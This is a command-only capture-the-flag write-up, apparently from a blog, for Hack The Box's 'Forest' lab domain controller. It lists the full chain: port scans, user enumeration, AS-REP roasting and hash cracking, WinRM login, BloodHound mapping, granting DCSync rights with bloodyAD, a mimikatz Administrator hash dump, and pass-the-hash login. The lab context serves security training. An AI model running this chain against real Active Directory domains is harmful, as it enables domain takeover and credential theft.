Avatar Pwned machines

Forest

Forest


Created by Page Difficulty OS
egre55 & mrb3n Hack The Box Easy Windows

nmap -p- --open --min-rate 5000 -Pn -sS 10.10.10.161 -oG scan
/opt/extractports scan
nmap -p53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49667,49671,49676,49677,49684,49706 -Pn -sCV 10.10.10.161 -oN ports

image

enum4linux -a 10.10.10.161

/opt/kerbrute userenum  --dc 10.10.10.161 -d htb.local /home/rufo/users

image

impacket-GetNPUsers htb.local/ -no-pass  -usersfile /home/rufo/valid_users 
hashcat -m 18200 hash_svc-alfresco /usr/share/wordlists/rockyou.txt

image

evil-winrm -i 10.10.10.161 -u svc-alfresco -p s3rvice

image

neo4j console
rdate -n 10.10.10.161
bloodhound-python -c all -u svc-alfresco -p s3rvice -ns 10.10.10.161 -d htb.local
bloodhound &>/dev/null &

image

Add-ADGroupMember -Identity "EXCHANGE WINDOWS PERMISSIONS" -Members "svc-alfresco"
./bloodyAD.py --host "10.10.10.161" -d "htb.local" -u "svc-alfresco" -p "s3rvice" add dcsync "svc-alfresco"
.\mimikatz.exe privilege::debug "lsadump::dcsync /domain:htb.local /user:Administrator" exit
evil-winrm -i 10.10.10.161 -u Administrator -H 32693b11e6aa90eb43d32c72a07ceea6

image